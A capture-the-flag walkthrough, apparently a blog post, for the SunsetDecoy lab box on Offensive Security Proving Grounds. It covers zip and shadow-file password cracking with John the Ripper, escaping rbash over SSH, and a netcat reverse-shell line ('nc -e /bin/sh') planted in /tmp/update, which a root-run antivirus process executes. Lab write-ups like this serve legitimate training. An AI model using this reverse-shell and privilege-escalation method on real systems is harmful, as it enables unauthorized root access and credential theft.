Log in here with a Kali linux box: https://portal.offensive-security.com/proving-grounds/play
Get a free VPN set of credentials and connect. Click to start the target box called SunsetDecoy and do these steps:
- Scan to find tcp/22 and 80 open. Browse to 80 to find save.zip
- The file is password protected to crack it with something like frackzip or zip2john to find the password.
- Unzip to find key files from /etc/shadow, passwd, sudoers, hosts and others. Note the absurd username 296640a3b825115a47b68fc44501c828.
- Use ‘unshadow’ to combine passwd with shadow and run it through john the ripper to reveal the password for the absurd username numbers to connect with ssh with $ssh 296640a3b825115a47b68fc44501c828@192.168.229.85 -t “bash –noprofile” and the password you find above. (I’m not telling it to you b/c I want you to learn through the process.)
- Once connected, you’ll be in rbash or restricted bash but the -t “bash –norofile” helps but you’ll have to specify binaries like with /usr/bin/cat (Absolute path)
- In the home directory of the user account ending in 828 above, you’ll see some files of interest, notably the first flag is there.
- The Av that you execute below looks for a file in /tmp/update and that process runs as root so …
- echo “/usr/bin/nc -e /bin/sh 192.168.X.X 4444” >/tmp/update and it will run as root when the AV process executes.
- On your local box, run #nc -lvp 4444 to intercept the incoming root shell from the target.
- Another key file is called honeypot.decoy that’s set to chmod +x. Run that and run the AV selection to execute the /tmp/update file that opens the reverse shell back to you.
- Check your netcat listener and you’ll see the shell open. You won’t get a local echo or prompt, just a new line with root privs.
- cd /root and cat proof.txt for the string to get credit.
PS You’ll see some decoys like in the honeypot.decoy binary when you run it and select ‘leave a message’. The filename generated is cmFuZG9tc2Zvc2FuZm9kYW52cw== . If you’re not familiar, this is a base64 encoded string.
To decode, enter $echo cmFuZG9tc2Zvc2FuZm9kYW52cw== |base64 -d
randomsfosanfodanvs
This isn’t useful for anything I found but it’s part of the process for uncovering information toward your objective.